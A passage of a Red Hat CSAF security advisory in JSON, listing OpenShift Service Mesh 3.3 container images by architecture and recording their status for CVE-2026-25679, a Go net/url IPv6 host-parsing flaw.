"registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le", "product_id": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le", "product_identification_helper": {"purl": "pkg:oci/istio-proxyv2-rhel9@sha256%3A654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776293296"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le", "product_id": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le", "product_identification_helper": {"purl": "pkg:oci/istio-ztunnel-rhel9@sha256%3A14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776232457"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x", "product_id": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x", "product_identification_helper": {"purl": "pkg:oci/istio-cni-rhel9@sha256%3A502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776233000"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x", "product_id": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x", "product_identification_helper": {"purl": "pkg:oci/istio-must-gather-rhel9@sha256%3A03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776141540"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x", "product_id": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x", "product_identification_helper": {"purl": "pkg:oci/istio-rhel9-operator@sha256%3A8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776419718"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x", "product_id": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x", "product_identification_helper": {"purl": "pkg:oci/istio-pilot-rhel9@sha256%3Ae7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776233016"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x", "product_id": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x", "product_identification_helper": {"purl": "pkg:oci/istio-proxyv2-rhel9@sha256%3Af45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776293296"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x", "product_id": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x", "product_identification_helper": {"purl": "pkg:oci/istio-ztunnel-rhel9@sha256%3A35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776232457"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64 as a component of Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64"}, "product_reference": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64", "relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.3"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x", "Red Hat OpenShift Service Mesh 